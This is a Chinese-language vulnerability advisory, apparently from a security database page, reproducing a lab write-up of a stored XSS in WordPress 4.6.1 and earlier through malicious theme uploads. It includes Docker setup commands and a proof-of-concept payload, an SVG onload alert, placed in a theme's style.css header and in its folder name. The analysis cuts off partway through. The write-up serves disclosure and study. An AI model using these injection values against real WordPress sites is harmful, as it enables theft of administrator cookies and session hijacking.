Wordpress <= 4.6.1 Stored XSS Via...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

**Author: p0wd3r (知道创宇404安全实验室)** ## 0x00 漏洞概述 ### 1.漏洞简介 [WordPress](https://wordpress.org/)是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统,近日研究者发现在其<=4.6.1版本中,通过上传恶意构造的主题文件可以触发一个后台存储型XSS漏洞。通过该漏洞,攻击者可以在能够上传主题文件的前提下执行获取管理员Cookie等敏感操作。 ### 2.漏洞影响 在能够上传主题文件的前提下执行获取管理员Cookie等XSS可以进行的攻击,实际的攻击场景有以下两种: - 攻击者诱导管理员上传恶意构造的主题文件,且管理员并没有对文件进行检查 - 攻击者拥有管理员权限可以直接上传主题文件,但既然已经有管理员权限再进行这样的攻击也就多此一举了 ### 3.影响版本 <= 4.6.1 ## 0x01 漏洞复现 ### 1. 环境搭建 ```bash docker pull wordpress:4.6.1 docker pull mysql docker run --name wp-mysql -e MYSQL_ROOT_PASSWORD=hellowp -e MYSQL_DATABASE=wp -d mysql docker run --name wp --link wp-mysql:mysql -d wordpress ``` ### 2.漏洞分析 我们先随便下载一个主题: ```bash wget https://downloads.wordpress.org/theme/illdy.1.0.29.zip unzip -x illdy.1.0.29.zip ``` 然后对`illdy/style.css`进行如下更改: ```css /* Theme Name: <svg onload=alert(1234)> ... DO NOT CHANGES HERE ... */ ``` 接着更改文件夹名字再打包: ```bash mv illdy "<svg onload=alert(5678)>" zip -r theme.zip "<svg onload=alert(5678)>" ``` 构造好之后我们登录后台上传该主题文件,同时开始动态调试。...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息